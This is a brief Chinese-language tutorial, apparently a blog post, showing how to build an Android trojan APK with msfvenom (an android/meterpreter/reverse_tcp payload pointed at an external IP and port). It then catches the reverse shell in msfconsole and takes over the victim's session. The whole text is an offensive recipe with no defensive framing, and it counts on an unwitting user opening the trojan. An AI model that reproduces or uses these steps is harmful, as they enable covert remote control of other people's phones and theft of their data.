首先要kali进行内网穿透，可参考http://www.cnblogs.com/sch01ar/p/7562954.html

首先生成一个apk木马

命令：msfvenom -p android/meterpreter/reverse_tcp LHOST=外网IP LPORT=端口 R > /root/sch01ar.apk

启动msf，来监听反弹，命令为：msfconsole

然后设置一下payload，IP和端口

show options来查看一下

 

exploit开启监听

有人点击木马的话将会返回一个会话

输入命令sessions查看会话

输入命令sessions -i 2选择会话2，因为我这第一个会话断了，所以又开启了一个

输入命令help查看帮助，后面的操作就不再阐述了